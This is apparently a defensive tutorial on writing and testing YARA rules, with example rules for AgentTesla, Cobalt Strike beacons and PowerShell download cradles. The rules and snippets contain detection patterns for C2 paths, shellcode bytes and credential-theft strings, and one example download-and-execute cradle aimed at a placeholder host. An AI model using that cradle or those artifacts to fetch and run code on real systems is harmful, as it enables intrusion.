YARA Rules for Malware Detection

Custom YARA rules for detecting malware families and attacker tooling observed in regional threat campaigns, with authoring methodology, testing procedures, and SIEM integration.

Overview

YARA is the de facto standard for malware classification and detection. A well-written YARA rule can identify a malware family across samples even when hashes change — by targeting the underlying code patterns, strings, and structural features that threat actors reuse.
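
To make the hash-versus-pattern point concrete, here is a small Python sketch. The two byte strings are made-up stand-ins for two builds of one family (not real samples), and the mutex name is the placeholder used in the template rule in Step 4.

```python
import hashlib

# Hypothetical stand-ins for two builds of the same family:
# identical embedded mutex name, one differing trailing byte.
MARKER = b"Global\\MutexName_12AB"
build_a = b"MZ" + b"\x00" * 16 + MARKER + b"\x01"
build_b = b"MZ" + b"\x00" * 16 + MARKER + b"\x02"


def sha256_hex(data: bytes) -> str:
    """Return the SHA-256 digest of data as a hex string."""
    return hashlib.sha256(data).hexdigest()


def shares_marker(data: bytes, marker: bytes = MARKER) -> bool:
    """True if the reused byte pattern is present anywhere in data."""
    return marker in data


# A one-byte change gives a different hash, so a hash IOC misses build_b.
print(sha256_hex(build_a) == sha256_hex(build_b))
# The reused string is still present in both builds.
print(shares_marker(build_a) and shares_marker(build_b))
```

A string-based rule keyed on the marker would keep matching after the rebuild, while a hash list would need a new entry for every build.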

This project covers:

  • The methodology for authoring effective YARA rules
  • Rules developed for malware families and tools observed in regional campaigns
  • Testing and validation procedures before deployment
  • Integration with SIEM, EDR, and sandbox platforms

YARA Rule Authoring Methodology

Writing a rule that fires on real malware without generating false positives requires a structured approach.

Step 1 — Collect samples

Start with at least three samples from the same family, and ideally five or more, so that you can tell shared traits from per-build noise. Sources:

  • MalwareBazaar (abuse.ch) — free, tagged by family
  • VirusTotal — search by behaviour or YARA match
  • Any.run — pull samples from public sandbox sessions
  • Internal SIEM/EDR — malware that actually hit your environment

Step 2 — Static analysis — find unique strings

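# Extract printable strings from each sample (add -e l to also catch UTF-16LE strings)
export LC_ALL=C   # byte-wise sort order, which comm expects
strings -n 8 sample.exe  | sort -u > strings_sample1.txt
strings -n 8 sample2.exe | sort -u > strings_sample2.txt

# Keep strings common to both samples
comm -12 strings_sample1.txt strings_sample2.txt > common_strings.txt

# Remove strings that also occur in a known-clean binary (clean.exe is a placeholder)
strings -n 8 clean.exe | sort -u > strings_clean.txt
comm -23 common_strings.txt strings_clean.txt > candidate_strings.txt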

Strings worth targeting:

  • Mutex names (malware often uses a unique mutex to prevent double-execution)
  • Registry keys used for persistence
  • C2 URL patterns (even partial paths like /gate.php)
  • Custom user-agent strings
  • Hardcoded error messages or debug strings
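
The same string-diffing idea can be sketched in Python, which makes it easy to cover UTF-16LE strings as well as ASCII ones. This is a minimal sketch, not a replacement for FLOSS or a proper triage pipeline; the function names and the 8-character minimum are illustrative choices.

```python
import re

# Runs of 8+ printable ASCII bytes, and the same characters stored as UTF-16LE.
ASCII_RE = re.compile(rb"[\x20-\x7e]{8,}")
WIDE_RE = re.compile(rb"(?:[\x20-\x7e]\x00){8,}")


def extract_strings(data):
    """Return the set of printable ASCII and UTF-16LE strings found in data."""
    found = {m.group().decode("ascii") for m in ASCII_RE.finditer(data)}
    found |= {m.group().decode("utf-16-le") for m in WIDE_RE.finditer(data)}
    return found


def candidate_strings(samples, clean):
    """Strings present in every sample and absent from every clean file."""
    if not samples:
        return set()
    common = set.intersection(*(extract_strings(s) for s in samples))
    for blob in clean:
        common -= extract_strings(blob)
    return common
```

Feed it the raw bytes of each file (for example `open(path, "rb").read()`); whatever survives is a shortlist to review by hand, not a finished rule.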

Step 3 — Binary pattern analysis

# Use radare2 to find unique byte sequences
r2 sample.exe
[0x00401000]> /x 4d5a  # Find MZ header
[0x00401000]> pd 20    # Disassemble 20 instructions

# Or use FLOSS for obfuscated string extraction
floss sample.exe > floss_output.txt
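
Once you have the same code region carved from several samples, the bytes that differ between them (stack sizes, relative call offsets) are the ones to wildcard. A minimal Python sketch of that step follows; `build_hex_pattern` is a hypothetical helper, and it assumes the byte sequences are already aligned and of equal length.

```python
def build_hex_pattern(sequences):
    """Build a YARA hex string from aligned, equal-length byte sequences.

    Bytes that are identical in every sequence are kept; any position
    that differs becomes the ?? wildcard.
    """
    if not sequences:
        raise ValueError("need at least one byte sequence")
    length = len(sequences[0])
    if any(len(seq) != length for seq in sequences):
        raise ValueError("all sequences must have the same length")

    tokens = []
    for column in zip(*sequences):  # one tuple of byte values per offset
        if len(set(column)) == 1:
            tokens.append(f"{column[0]:02X}")
        else:
            tokens.append("??")
    return "{ " + " ".join(tokens) + " }"


# Two function prologues that differ only in the stack-frame size.
a = bytes.fromhex("558BEC83EC10535657")
b = bytes.fromhex("558BEC83EC24535657")
print(build_hex_pattern([a, b]))
```

Patterns that end up mostly wildcards are a sign the region is too variable to anchor a rule on.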

Step 4 — Write the rule

rule Malware_Family_Name {
    meta:
        description = "Detects [Family] based on mutex, PDB path, and C2 pattern"
        author      = "Mohammad Al Sayegh"
        date        = "2026-03-01"
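        hash1       = "e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855"  // placeholder: SHA-256 of an empty file; replace with a real sample hash
        tlp         = "CLEAR"  // TLP 2.0 name for the former TLP:WHITE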
        mitre_att_ck = "T1059.003, T1547.001"

    strings:
        $mutex       = "Global\\MutexName_12AB" ascii wide
        $pdb_path    = "C:\\Users\\dev\\malware\\Release\\payload.pdb" ascii
        $c2_pattern  = "/api/v2/gate?uid=" ascii
        $reg_key     = "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\\Updater" ascii wide
        $packed_stub = { 55 8B EC 83 EC ?? 53 56 57 E8 ?? ?? ?? ?? }

    condition:
        uint16(0) == 0x5A4D  // MZ header — must be a PE file
        and filesize < 5MB
        and (
            $mutex or $pdb_path or $c2_pattern
            or ($reg_key and $packed_stub)
        )
}
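
The first two condition lines are cheap pre-filters, and `uint16(0) == 0x5A4D` often confuses newcomers because the bytes on disk are `4D 5A` ("MZ"). `uint16` reads little-endian, so the value is written byte-swapped. A minimal Python equivalent of those two checks, with a hypothetical function name:

```python
import struct

MAX_SIZE = 5 * 1024 * 1024  # YARA's "5MB" means 5 * 2**20 bytes


def passes_prefilter(data: bytes) -> bool:
    """Mirror `uint16(0) == 0x5A4D and filesize < 5MB` from the rule."""
    if len(data) < 2 or len(data) >= MAX_SIZE:
        return False
    # "<H" = little-endian unsigned 16-bit, the same read uint16(0) performs.
    (magic,) = struct.unpack_from("<H", data, 0)
    return magic == 0x5A4D


print(passes_prefilter(b"MZ\x90\x00"))  # starts with 4D 5A
print(passes_prefilter(b"\x7fELF"))     # not a PE file
```

Putting these checks first in the condition keeps the rule from reporting on non-PE files and very large files.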

Step 5 — Test before deployment

# Test against known-bad samples (should ALL match)
yara -r rule.yar /path/to/malware_samples/

# Test against clean binaries (should produce ZERO matches)
yara -r rule.yar /path/to/clean_windows_binaries/
# On a Windows host: quote the path and drop the trailing backslash
yara -r rule.yar "C:\Windows\System32"

# Test performance (rules with complex regex can be slow)
time yara -r rule.yar /large/file/corpus/

Example Rules

Rule 1 — AgentTesla Keylogger

AgentTesla is a widely used commodity keylogger and credential stealer sold on underground forums. It is frequently weaponised in phishing campaigns targeting the Middle East.

rule AgentTesla_Keylogger {
    meta:
        description  = "Detects AgentTesla keylogger based on namespace artifacts, SMTP exfil strings, keylogging strings, and credential-theft targets"
        author       = "Mohammad Al Sayegh"
        date         = "2026-01-10"
        mitre_att_ck = "T1056.001, T1071.003"
        reference    = "https://malpedia.caad.fkie.fraunhofer.de/details/win.agent_tesla"

    strings:
        // SMTP exfiltration strings, hardcoded in many variants.
        // .NET string literals are stored as UTF-16, so match wide as well as ascii.
        $smtp1 = "smtp.gmail.com" ascii wide nocase
        $smtp2 = "mail.yahoo.com" ascii wide nocase
        $smtp3 = "smtp.mail.ru"   ascii wide nocase

        // Keylogger capability strings ($kl1 is an imported API name, stored as ASCII/UTF-8)
        $kl1 = "GetAsyncKeyState" ascii
        $kl2 = "[Shift]"          ascii wide
        $kl3 = "[Caps Lock]"      ascii wide
        $kl4 = "[Backspace]"      ascii wide

        // .NET artifact: common namespace
        $ns1 = "AgentTesla"      ascii wide
        $ns2 = "Tesla.Keylogger" ascii wide

        // Credential theft targets
        $cred1 = "filezilla"   ascii wide nocase
        $cred2 = "chrome"      ascii wide nocase
        $cred3 = "outlook"     ascii wide nocase

    condition:
        uint16(0) == 0x5A4D
        and filesize < 3MB
        and (
            ($ns1 or $ns2)
            or (2 of ($smtp*) and 2 of ($kl*))
            or (2 of ($cred*) and 1 of ($kl*))
        )
}
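
The `ascii` and `wide` modifiers matter a lot for .NET families such as AgentTesla, because string literals in a .NET assembly are stored as UTF-16LE rather than as single-byte text. The Python sketch below models the two modifiers for plain substring matching (it ignores `nocase` and everything else YARA does); `text_match` is a hypothetical helper.

```python
def text_match(data: bytes, text: str, use_ascii: bool = True, use_wide: bool = False) -> bool:
    """Rough model of YARA's ascii / wide modifiers for a text string."""
    hit = False
    if use_ascii:
        hit = hit or text.encode("ascii") in data
    if use_wide:
        # wide = each character followed by a zero byte (UTF-16LE for ASCII text)
        hit = hit or text.encode("utf-16-le") in data
    return hit


# A fragment laid out the way a .NET string literal is stored.
blob = b"\x00\x00" + "smtp.gmail.com".encode("utf-16-le") + b"\x00\x00"

print(text_match(blob, "smtp.gmail.com", use_ascii=True, use_wide=False))
print(text_match(blob, "smtp.gmail.com", use_ascii=True, use_wide=True))
```

The first check misses and the second hits, which is why strings meant to catch literals inside a .NET binary are usually declared `ascii wide`.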

Rule 2 — Cobalt Strike Beacon (Default Config)

Cobalt Strike is a legitimate penetration testing tool that has been heavily adopted by threat actors. Default configurations leave identifiable artifacts.

rule CobaltStrike_Beacon_Default {
    meta:
        description  = "Detects Cobalt Strike Beacon with default or near-default configuration"
        author       = "Mohammad Al Sayegh"
        date         = "2026-01-22"
        mitre_att_ck = "T1071.001, T1573.002"
        reference    = "https://www.cobaltstrike.com"

    strings:
        // Default sleep/jitter strings in beacon config
        $sleep     = "%d (seconds)" ascii
        $jitter    = "Set %s.Metadata" ascii

        // Common default C2 URIs in many leaked/cracked versions
        $uri1 = "/updates.rss"   ascii
        $uri2 = "/dpixel"        ascii
        $uri3 = "/______util.js" ascii
        $uri4 = "/jquery-3.3.1.slim.min.js" ascii

        // Beacon shellcode staging pattern
        $shellcode = { FC E8 8? 00 00 00 60 89 E5 31 D2 64 8B 52 30 }

        // Named pipe for SMB beacon
        $pipe = "\\\\.\\pipe\\msagent_" ascii wide

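    condition:
        // Every declared string must be referenced, otherwise YARA refuses to compile the rule
        (uint16(0) == 0x5A4D and filesize < 10MB
         and (2 of ($uri*)
              or ($shellcode and 1 of ($uri*))
              or ($sleep and $jitter and 1 of ($uri*))))
        or ($pipe and $shellcode)
}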
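
The `8?` in `$shellcode` is a nibble wildcard: the high nibble must be 8 and the low nibble can be anything, which tolerates small differences in the call offset between stager builds. As a rough illustration of how such a pattern is evaluated (not how YARA implements it internally), here is a small Python matcher; both function names are hypothetical.

```python
def parse_hex_pattern(pattern):
    """Turn 'FC E8 8? ??' into a list of (value, mask) pairs, one per byte."""
    pairs = []
    for token in pattern.split():
        if len(token) != 2:
            raise ValueError(f"bad token: {token!r}")
        value = mask = 0
        for ch in token:
            value <<= 4
            mask <<= 4
            if ch != "?":
                value |= int(ch, 16)
                mask |= 0xF
        pairs.append((value, mask))
    return pairs


def find_hex_pattern(data, pattern):
    """Return the first offset where pattern matches data, or -1."""
    pairs = parse_hex_pattern(pattern)
    for start in range(len(data) - len(pairs) + 1):
        if all((data[start + i] & mask) == value
               for i, (value, mask) in enumerate(pairs)):
            return start
    return -1


PATTERN = "FC E8 8? 00 00 00 60 89 E5 31 D2 64 8B 52 30"
stub = bytes.fromhex("FCE8890000006089E531D2648B5230")
print(find_hex_pattern(b"\x90\x90" + stub, PATTERN))
```

Each `?` widens what the pattern accepts, so use nibble wildcards only where the samples actually vary.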

Rule 3 — PowerShell Download Cradle (Generic)

Download cradles are used across many campaigns to pull second-stage payloads. This rule targets common obfuscation patterns.

rule PowerShell_Download_Cradle {
    meta:
        description  = "Detects common PowerShell download cradle patterns used in phishing and initial access"
        author       = "Mohammad Al Sayegh"
        date         = "2026-02-05"
        mitre_att_ck = "T1059.001, T1105"

    strings:
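        // Invoke-Expression variants; fullword stops the 3-letter "IEX" from matching inside longer tokens.
        // wide is added throughout because scripts are often saved as UTF-16LE.
        $iex1 = "IEX"                       ascii wide nocase fullword
        $iex2 = "Invoke-Expression"          ascii wide nocase
        $iex3 = "&([scriptblock]::Create("   ascii wide nocase

        // Download methods. A separate "WebClient" string is omitted: it would also match
        // inside "Net.WebClient" and let a single token satisfy "2 of ($dl*)".
        $dl1 = "DownloadString"    ascii wide nocase
        $dl2 = "DownloadFile"      ascii wide nocase
        $dl3 = "Net.WebClient"     ascii wide nocase
        $dl4 = "Invoke-WebRequest" ascii wide nocase

        // Bypass techniques
        $bp1 = "bypass"              ascii wide nocase
        $bp2 = "-EncodedCommand"     ascii wide nocase
        $bp3 = "Set-ExecutionPolicy" ascii wide nocase

        // Long Base64 runs often indicate an encoded payload, but they also occur in benign
        // files (certificates, embedded images), so $b64 is only used with other indicators
        $b64 = /[A-Za-z0-9+\/]{100,}={0,2}/ ascii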

    condition:
        filesize < 500KB
        and (
            (1 of ($iex*) and 1 of ($dl*))
            or (1 of ($iex*) and $b64 and 1 of ($bp*))
            or (2 of ($dl*) and 1 of ($bp*))
        )
}
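
When the rule fires on a `-EncodedCommand` blob, the next triage step is usually to decode it. PowerShell expects that argument to be Base64 over the UTF-16LE bytes of the script, so decoding takes two steps. A minimal Python sketch follows; the helper names are hypothetical and the URL is a non-resolving placeholder.

```python
import base64


def encode_command(script: str) -> str:
    """Encode a script the way powershell.exe -EncodedCommand expects it."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def decode_command(blob: str) -> str:
    """Recover the original script from an -EncodedCommand argument."""
    return base64.b64decode(blob).decode("utf-16-le")


script = "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/a')"
blob = encode_command(script)

print(blob[:8])              # Base64 of UTF-16LE "IEX" is "SQBFAFgA"
print(decode_command(blob))  # round-trips to the original cradle
```

Because the cleartext keywords disappear once encoded, a fixed prefix such as `SQBFAFgA` is sometimes hunted for as a string in its own right.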

Testing Framework

Before a rule is deployed to production scanners, it must pass three gates:

# Gate 1: True Positive Rate (must match ≥ 95% of known samples)
yara rule.yar /samples/family_name/ | wc -l  # Compare with the sample count; at least 95% must match

# Gate 2: False Positive Rate (must produce 0 matches on the clean corpus)
yara rule.yar /corpus/windows_clean/ | wc -l   # Must be 0
yara rule.yar /corpus/office_suite/  | wc -l   # Must be 0

# Gate 3: Performance (must complete within 500ms per 100MB)
time yara rule.yar /test/100mb_file.bin
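
Counting lines with `wc -l` works for a single rule, but it over-counts when a file matches more than one rule. The first two gates can be scripted by parsing the CLI output, which by default prints one `rule_name file_path` line per match. A minimal Python sketch; the function names and the way output is passed in as text are illustrative assumptions.

```python
def matched_files(yara_output):
    """Return the set of file paths that appear in default `yara` CLI output."""
    files = set()
    for line in yara_output.splitlines():
        parts = line.strip().split(maxsplit=1)  # "<rule> <path>"
        if len(parts) == 2:
            files.add(parts[1])
    return files


def passes_gates(tp_output, sample_count, fp_output, min_tpr=0.95):
    """Gate 1: enough known samples matched. Gate 2: nothing clean matched."""
    if sample_count <= 0:
        raise ValueError("sample_count must be positive")
    tpr = len(matched_files(tp_output)) / sample_count
    false_positives = len(matched_files(fp_output))
    return tpr >= min_tpr and false_positives == 0
```

Capture each `yara` run's standard output (for example with `subprocess.run(..., capture_output=True, text=True)`) and pass the text in; Gate 3 still needs a separate timing run.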

Integrating YARA with Your Stack

CrowdStrike Custom IOA

Falcon’s Custom IOA and Custom IOC features do not take YARA rules directly. Instead, upload the hashes of files your rule matched as Custom IOCs (File Hash), or use the Intel API to correlate those hashes against CrowdStrike’s telemetry.

Splunk + YARA via TA

The Splunk YARA TA allows scanning file paths or stream data against YARA rules and generating alerts when a match fires.

Any.run / Cuckoo Sandbox

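Both platforms accept YARA rules for automated classification. Add your rules to Cuckoo’s yara/ rule directory (for example yara/binaries/ in Cuckoo 2.x; the signatures/ folder holds Python behavioural signatures, not YARA rules) or upload them to Any.run’s YARA manager.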

MISP

MISP has native YARA rule support. Store rules as yara typed attributes on threat actor or malware family events, and share with your ISAC or trusted partners under appropriate TLP.


All rules are provided for defensive, detection, and research purposes. Contact me at contact@malsayegh.ae to collaborate on detection development.

All rights Reserved for malsayegh.ae